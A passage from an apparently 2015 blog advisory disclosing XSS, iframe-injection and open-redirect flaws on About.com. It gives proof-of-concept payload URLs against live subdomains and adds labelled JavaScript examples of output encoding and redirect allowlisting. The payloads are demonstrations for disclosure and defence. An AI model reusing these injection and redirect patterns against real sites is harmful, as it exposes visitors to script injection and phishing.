<a href="https://2.bp.blogspot.com/-qkY3b7MCFxE/VM97bEcGNCI/AAAAAAAAApU/dPwaxIAztbs/s1600/about_all_xss_4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="http://2.bp.blogspot.com/-qkY3b7MCFxE/VM97bEcGNCI/AAAAAAAAApU/dPwaxIAztbs/s400/about_all_xss_4.png" width="400" /></a><span style="font-family: Arial, Helvetica, sans-serif;"><b>POC Codes, e.g.</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">/"><svg/onload=alert(/<wbr></wbr>justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ipod.about.com/lr/ipad_how-tos/9033" target="_blank">http://ipod.about.com/lr/ipad_<wbr></wbr>how-tos/9033</a>"><svg/onload=<wbr></wbr>alert(/justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://bizfinance.about.com/lr/businesscredit/fl/5-Ways-to-Start-Establishing-Business-Identity-Theft-Protection.htm/" target="_blank">http://bizfinance.about.com/<wbr></wbr>lr/businesscredit/fl/5-Ways-<wbr></wbr>to-Start-Establishing-<wbr></wbr>Business-Identity-Theft-<wbr></wbr>Protection.htm/</a>"><svg/onload=<wbr></wbr>alert(/justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://recycling.about.com/lr/Collecting/ss/EPS-Recycling-5-Reasons-Why-and-2-Why-Not.htm/" target="_blank">http://recycling.about.com/lr/<wbr></wbr>Collecting/ss/EPS-Recycling-5-<wbr></wbr>Reasons-Why-and-2-Why-Not.htm/</a><wbr></wbr>"><svg/onload=alert(/<wbr></wbr>justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://dc.about.com/lr/shopping/a/BlkFriday.htm/" target="_blank">http://dc.about.com/lr/<wbr></wbr>shopping/a/BlkFriday.htm/</a>"><<wbr></wbr>svg/onload=alert(/justqdjing/)<wbr></wbr>></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://healthtech.about.com/lr/Patient-Portals/fl/5-Ways-a-Patient-Portal-Can-Improve-Your-Health-Care-Experience.htm/" target="_blank">http://healthtech.about.com/<wbr></wbr>lr/Patient-Portals/fl/5-Ways-<wbr></wbr>a-Patient-Portal-Can-Improve-<wbr></wbr>Your-Health-Care-Experience.<wbr></wbr>htm/</a>"><svg/onload=alert(/<wbr></wbr>justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
<div>
<a href="https://www.youtube.com/watch?v=h5yELiJBxWo&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=h5yELiJBxWo&feature=youtu.be</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
</div>
<div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
<a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_2.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_2.html</span></a></div>
<div>
<a href="http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-cross-site-scripting-security-attacks/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-cross-site-scripting-security-attacks/</span></a></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(3) About Group About.com Main Page's Search Field XSS (Cross-Site Scripting) Security Vulnerabilities</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The About.com website has a security bug that can be exploited by XSS attacks.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The programming flaw occurs in the search field of the about.com main page, e.g.</span></div>
<div>
<a href="http://www.about.com/?q=googleandroidsystem" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/?q=<wbr></wbr>googleandroidsystem</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-LSf9LYXqz_g/VM9tHiZBFII/AAAAAAAAAog/M5TGcIqyWWs/s1600/about_search_xss1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="http://3.bp.blogspot.com/-LSf9LYXqz_g/VM9tHiZBFII/AAAAAAAAAog/M5TGcIqyWWs/s400/about_search_xss1.png" width="400" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC Codes, e.g.</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"--/>"><img src=x onerror=prompt(/justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.about.com/?q=" target="_blank">http://www.about.com/?q=</a>"--/>"<wbr></wbr>><img src=x onerror=prompt(/justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
<div>
<a href="https://www.youtube.com/watch?v=H4G7b_Jkqvw&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=H4G7b_Jkqvw&feature=youtu.be</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
<div>
<a href="http://tetraph.com/security/xss-vulnerability/about-group-about-com-main-pages-search-field-xss-cross-site-scripting-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/xss-vulnerability/about-group-about-com-main-pages-search-field-xss-cross-site-scripting-security-vulnerabilities/</span></a></div>
<div>
<a href="http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/</span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-main-pages-search.html">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-main-pages-search.html</a></span></div>
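<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The POC strings in sections (2) and (3) both close a double-quoted attribute and then open a new element. The following is an added example, not About.com's code and not part of the original advisory: it assumes a hypothetical template that echoes the request path into an href and the "q" parameter into an input value, and shows that template before and after context-aware encoding, run against the two POC strings above.</span></div>

```javascript
// Added example (not About.com's code). The template is hypothetical: it echoes
// the decoded request path into an href and the q parameter into an input value.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// HTML context: encode the five characters that can end an attribute value
// or open a tag.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// URL context: percent-encode the decoded path so quotes and angle brackets
// never appear literally inside the href.
function encodePath(path) {
  try {
    return encodeURI(path);
  } catch (err) {
    return '/'; // malformed UTF-16 (lone surrogate): fall back to the site root
  }
}

// BEFORE: decoded request data is concatenated straight into the markup.
function renderVulnerable(host, path, q) {
  return `<link rel="canonical" href="http://${host}${path}">\n` +
         `<input name="q" value="${q}">`;
}

// AFTER: each value is encoded for the context it lands in
// (URL encoding first, then HTML attribute encoding).
function renderHardened(host, path, q) {
  const href = `http://${escapeHtml(host)}${escapeHtml(encodePath(path))}`;
  return `<link rel="canonical" href="${href}">\n` +
         `<input name="q" value="${escapeHtml(q)}">`;
}

// Crude check for this demo only: collect the name that follows every literal
// "<" that starts a tag. A real test suite would use an HTML parser.
function elementNames(html) {
  return Array.from(html.matchAll(/<([a-z][a-z0-9]*)/gi), (m) => m[1].toLowerCase());
}

// The two POC strings from this page, as a server would see them after
// URL decoding.
const POC_PATH = '/lr/ipad_how-tos/9033"><svg/onload=alert(/justqdjing/)>';
const POC_QUERY = '"--/>"><img src=x onerror=prompt(/justqdjing/)>';

function demo() {
  return {
    vulnerable: elementNames(renderVulnerable('ipod.about.com', POC_PATH, POC_QUERY)),
    hardened: elementNames(renderHardened('ipod.about.com', POC_PATH, POC_QUERY)),
  };
}

console.log(demo());
```

<div>
<span style="font-family: Arial, Helvetica, sans-serif;">In the unencoded output the request data contributes two extra elements; in the encoded output only the template's own two elements remain.</span></div>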
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4) </b><b style="line-height: 19.911111831665px; text-align: justify;">About Group About.com All Topics (At least 99.88% links) Vulnerable to Iframe Injection (Cross Frame Scripting) Security Attacks</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">About Group has a security problem. It can be exploited by Iframe Injection (Cross Frame Scripting) attacks.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability occurs in the "zu" parameter of the about.com "offsite.htm" page, e.g.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://internationalinvest.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//facebook.com/yahoo" target="_blank">http://internationalinvest.<wbr></wbr>about.com/gi/dynamic/offsite.<wbr></wbr>htm?zi=1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//facebook.com/yahoo</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Use "<a href="http://whitehatpost.blog.163.com/" target="_blank">http://whitehatpost.blog.163.<wbr></wbr>com/</a>" for the following test.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) &amp; Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04), and Apple Safari 6.1.6 of Mac OS X Lion 10.7.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
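<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Sections (1.5) and (4) both come down to a destination parameter that is used without validation. The following is an added example, not About.com's code and not part of the original advisory: a server-side check for the "zu" value of an "offsite.htm"-style URL plus a matching Content-Security-Policy frame-src value. The allowlist and function names are assumptions; only the URL shape and the two hosts used as inputs come from this page.</span></div>

```javascript
// Added example (not About.com's code). ALLOWED_HOSTS is a constructed
// allowlist; a real deployment would load its own list from configuration.
const ALLOWED_HOSTS = new Set(['facebook.com', 'www.facebook.com']);

// requestUrl is the absolute URL of the incoming offsite.htm request.
function resolveOffsiteTarget(requestUrl) {
  const values = new URL(requestUrl).searchParams.getAll('zu');
  // Exactly one zu: duplicates let two layers disagree on which value counts.
  if (values.length !== 1) {
    return { ok: false, reason: 'expected exactly one zu' };
  }

  let target;
  try {
    // No base URL is passed, so relative and scheme-relative ("//host")
    // values throw instead of being resolved against our own origin.
    target = new URL(values[0]);
  } catch (err) {
    return { ok: false, reason: 'not an absolute URL' };
  }
  if (target.protocol !== 'http:' && target.protocol !== 'https:') {
    return { ok: false, reason: 'scheme not allowed' };
  }
  if (target.username !== '' || target.password !== '') {
    return { ok: false, reason: 'userinfo not allowed' };
  }
  if (target.port !== '') {
    return { ok: false, reason: 'non-default port not allowed' };
  }
  // Compare the parsed hostname, never a substring of the raw string.
  if (!ALLOWED_HOSTS.has(target.hostname)) {
    return { ok: false, reason: 'host not allowlisted' };
  }
  return { ok: true, href: target.href };
}

// Second layer: even if a bad value slips through, the browser refuses to
// load frames from hosts outside the same allowlist.
function frameSrcPolicy() {
  return `frame-src ${Array.from(ALLOWED_HOSTS).join(' ')}`;
}

// URL shape taken from this page; the zu values appended below are the page's
// own two hosts plus constructed malformed variants.
const OFFSITE = 'http://internationalinvest.about.com/gi/dynamic/offsite.htm' +
  '?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=';

const SAMPLES = [
  'http%3A//facebook.com/yahoo',
  'http%3A//whitehatpost.blog.163.com/',
  '//facebook.com/',
  'http%3A//facebook.com%40whitehatpost.blog.163.com/',
  'http%3A//facebook.com/&zu=http%3A//whitehatpost.blog.163.com/',
];

function checkSamples() {
  return SAMPLES.map((zu) => {
    const result = resolveOffsiteTarget(OFFSITE + zu);
    return result.ok ? `allow ${result.href}` : `deny (${result.reason})`;
  });
}

console.log(checkSamples());
console.log('Content-Security-Policy:', frameSrcPolicy());
```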
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-v3QkmmHTbDk/VM93CrcadWI/AAAAAAAAApI/DespTZWcrTI/s1600/about_international_iframe_jnjection.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><br /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-0Ojsly_n3-I/VM9_X_lDYuI/AAAAAAAAAps/3zUwqJ4Bmtg/s1600/about_inframe_injection.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="http://4.bp.blogspot.com/-0Ojsly_n3-I/VM9_X_lDYuI/AAAAAAAAAps/3zUwqJ4Bmtg/s400/about_inframe_injection.png" width="400" /></span></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="http://1.bp.blogspot.com/-v3QkmmHTbDk/VM93CrcadWI/AAAAAAAAApI/DespTZWcrTI/s400/about_international_iframe_jnjection.png" width="400" /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URLs:</span></b></div>
<div>
<a href="http://homerenovations.about.com/od/fundingyourrenovation/tp/8-Remodels-That-Maximize-Curb-Appeal-For-Higher-Selling-Price.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://homerenovations.about.<wbr></wbr>com/od/fundingyourrenovation/<wbr></wbr>tp/8-Remodels-That-Maximize-<wbr></wbr>Curb-Appeal-For-Higher-<wbr></wbr>Selling-Price.htm</span></a></div>
<div>
<a href="http://publishing.about.com/od/Childrens-and-YA-Books/fl/A-Literary-linkedin-Agents-ebay-Advice-Hao123-to-Childrens-and-Bing-Sohu-YA-Dailymail-Authors-Snapdeal.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://publishing.about.com/<wbr></wbr>od/Childrens-and-YA-Books/fl/<wbr></wbr>A-Literary-linkedin-Agents-<wbr></wbr>ebay-Advice-Hao123-to-<wbr></wbr>Childrens-and-Bing-Sohu-YA-<wbr></wbr>Dailymail-Authors-Snapdeal.htm</span></a></div>
<div>
<a href="http://chinesefood.about.com/od/chickenrecipes/tp/chicken-stir-fry-flipkart-adobe-alipay-pork-dropbox-blogger-github-jd-chinadaily-huffingtonpost-Livedoor-Buzzfeed-Themeforest-Godaddy.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://chinesefood.about.com/<wbr></wbr>od/chickenrecipes/tp/chicken-<wbr></wbr>stir-fry-flipkart-adobe-<wbr></wbr>alipay-pork-dropbox-blogger-<wbr></wbr>github-jd-chinadaily-<wbr></wbr>huffingtonpost-Livedoor-<wbr></wbr>Buzzfeed-Themeforest-Godaddy.<wbr></wbr>htm</span></a></div>
<div>
<a href="http://menshair.about.com/od/facialhair/qt/growbeard-ask-360cn-mailru-gmw-googleleadservices-bbc-pornhub-peoplecn-rakuten-nicovideo-dailymotion-1-dmm-deviantart.htm/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://menshair.about.com/od/<wbr></wbr>facialhair/qt/growbeard-ask-<wbr></wbr>360cn-mailru-gmw-<wbr></wbr>googleleadservices-bbc-<wbr></wbr>pornhub-peoplecn-rakuten-<wbr></wbr>nicovideo-dailymotion-1-dmm-<wbr></wbr>deviantart.htm/</span></a></div>
<div>
<a href="http://jobsearch.about.com/od/coverletters/a/types-sogou-outbrain-booking-chase-pixnet-reddit-pinterest-vk-msn-imdb-of-cover-qq-letters-bankofamerica-twitter-Wikia-Etsy.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://jobsearch.about.com/od/<wbr></wbr>coverletters/a/types-sogou-<wbr></wbr>outbrain-booking-chase-pixnet-<wbr></wbr>reddit-pinterest-vk-msn-imdb-<wbr></wbr>of-cover-qq-letters-<wbr></wbr>bankofamerica-twitter-Wikia-<wbr></wbr>Etsy.htm</span></a></div>
<div>
<a href="http://testprep.about.com/od/The-Redesigned-PSAT/fl/Redesigned-PSAT-101-Flickr-Globo-Xnxx-Tudou-Yelp-Douban-Ameblo-33-Vimeo-Ettoday-Redtube-Directrev-Salesforce-Coccoc.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://testprep.about.com/od/<wbr></wbr>The-Redesigned-PSAT/fl/<wbr></wbr>Redesigned-PSAT-101-Flickr-<wbr></wbr>Globo-Xnxx-Tudou-Yelp-Douban-<wbr></wbr>Ameblo-33-Vimeo-Ettoday-<wbr></wbr>Redtube-Directrev-Salesforce-<wbr></wbr>Coccoc.htm</span></a></div>
<div>
<div>
</div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b><br />
<a href="http://fictionwriting.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://fictionwriting.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com</span></a></div>
<div>
<a href="http://internationalinvest.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://internationalinvest.<wbr></wbr>about.com/gi/dynamic/offsite.<wbr></wbr>htm?zi=1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//tetraph.com</span></a></div>
<div>
<a href="http://inventors.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//itinfotechnology.wordpress.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://inventors.about.com/gi/<wbr></wbr>dynamic/offsite.htm?zi=1/XJ/<wbr></wbr>Ya&sdn=internationalinvest&<wbr></wbr>cdn=prep&tm=2&f=21&tt=14&bt=0&<wbr></wbr>bts=1&zu=http%3A//<wbr></wbr>itinfotechnology.wordpress.com</span></a></div>
<div>
<a href="http://sbinformation.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com/security" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://sbinformation.about.<wbr></wbr>com/gi/dynamic/offsite.htm?zi=<wbr></wbr>1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//tetraph.com/security</span></a></div>
<div>
<a href="http://ancienthistory.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//inzeed.com/security" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://ancienthistory.about.<wbr></wbr>com/gi/dynamic/offsite.htm?zi=<wbr></wbr>1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//inzeed.com/security</span></a></div>
<div>
<a href="http://specialchildren.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://specialchildren.about.<wbr></wbr>com/gi/dynamic/offsite.htm?zi=<wbr></wbr>1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//diebiyi.com/security</span></a></div>
<div>
<div>
<a href="http://womenshistory.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://womenshistory.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security</span></a></div>
<div>
<a href="http://budgetdecorating.about.com/o/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://budgetdecorating.about.com/o/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security</span></a></div>
<div>
<a href="http://makeup.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://makeup.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security</span></a></div>
</div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
<div>
<a href="https://www.youtube.com/watch?v=hx_sdDmSkg0&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=hx_sdDmSkg0&feature=youtu.be</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b><br />
<a href="http://tetraph.com/security/iframe-injection/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-iframe-injection-cross-frame-scripting-security-attacks/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/iframe-injection/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-iframe-injection-cross-frame-scripting-security-attacks/</span></a><br />
<a href="http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/</span></a><br />
<a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at.html</span></a></div>
</div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(5) About (about.com) Open Redirect Multiple (Dest Redirect Privilege Escalation) Security Vulnerabilities</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The About Group online web application has a security vulnerability. It can be exploited by Unvalidated Redirects and Forwards (URL Redirection) attacks. This could allow a user to create a specially crafted URL that, if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful because the crafted URL initially appears to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client-side software such as a web browser or document rendering programs.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be exploited without user login. Tests were performed on Microsoft IE (10.0.9200.16750) on Windows 8, Mozilla Firefox (34.0) and Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) on Ubuntu (14.04), and Apple Safari 6.1.6 on Mac OS X Lion 10.7.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The following tests use one webpage as the redirect destination. The webpage address is "<a href="http://www.inzeed.com/kaleidoscope/" target="_blank">http://www.inzeed.com/kaleidoscope/</a>". Suppose that this webpage is malicious.</span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 1:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="http://www.about.com/snf.htm?u=http://www.instagram.com/facebook/craigslist" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/snf.htm?<wbr></wbr>u=http://www.instagram.com/<wbr></wbr>facebook/craigslist</span></a></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<a href="http://www.about.com/snf.htm?u=http://www.inzeed.com/essayjeans/poems/thatday.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/snf.htm?<wbr></wbr>u=http://www.inzeed.com/<wbr></wbr>essayjeans/poems/thatday.html</span></a></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 2:</span></b></div>
<div>
<a href="http://clk.about.com/?zi=13/1tO&ity=boostOrg&o=0&eng=boost&zu=http://paypal.com/imgur/xinhuanet" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://clk.about.com/?zi=13/<wbr></wbr>1tO&ity=boostOrg&o=0&eng=<wbr></wbr>boost&zu=http://paypal.com/<wbr></wbr>imgur/xinhuanet</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
